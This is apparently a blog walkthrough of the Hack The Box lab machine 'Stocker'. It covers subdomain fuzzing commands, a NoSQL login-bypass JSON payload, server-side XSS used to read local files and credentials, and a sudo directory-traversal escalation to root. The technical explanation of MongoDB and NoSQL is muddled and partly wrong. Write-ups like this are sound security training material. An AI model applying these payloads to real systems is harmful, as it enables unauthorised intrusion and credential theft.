Home Stocker
Post
Cancel

Stocker

Posted Mar 1, 2023 Updated Mar 3, 2023
By 0xskar
1 min read

Enumeration

nmap

nmap shows us two open ports 22,80

wfuzz

1

wfuzz -c -t 50 -u http://stocker.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.stocker.htb" --hc 301

or

gobuster

1

gobuster vhost -u http://stocker.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain

dev.stocker.htb - Express Mongo NoSQL

We start by capturing a login request in burpsquite.

Capturing a login request in burp

This server is using Express. Express servers use MongoDB, a popular NoSQL language that is more performance oriented and has improved security because it elimated the SQL language and relys on a structured querty language like dictionaries that is found in JSON or java or python.

This goes over the exploitation process more in depth.

We can use a json authentication bypass from payload all the things.

We can set the content-type to application/json and use this json payload to access /stock

1

{"username": {"$ne": null}, "password": {"$ne": null}}

LFI

Adding stock and capturing the add to cart request in the burp suite proxy that this uses more json to create the pdf. We can modify the json and perform service side xss.

Dynamic Server side XSS

We pick up a few users here:

1
2
3

mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false

Lets try to read some more files. This server is running Express and NodeJS, and our webserver can be assumed to running at /var/www/dev we can read index.js with our LFI and get DB credentials.

MongoDB Credentials located inside of the DEV

We can use these credentials to login to the ssh via angoose.

system

Pick up the first flag

Pretty easy to pwn the machine from here. sudo -l

1
2
3
4
5
6

[sudo] password for angoose: 
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

There is a tst.js in the users home that will read roots flag. We can use directory traversal to get the final flag.

1

sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/tst.js

This box took me weeks to finish. I am currently trying to focus on my weaknesses which are exploiting the many different underlying web technologies.

Walkthrough, Hackthebox, CTF
web wfuzz nmap nosql dynamic XSS express MongoDB LFI
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents